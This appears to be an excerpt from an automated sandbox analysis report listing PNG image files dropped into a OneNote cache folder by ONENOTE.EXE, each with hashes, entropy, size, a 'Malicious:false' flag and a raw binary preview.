                                                                                                                                                                                                          Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000O.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000Q.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000U.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000V.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000011.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
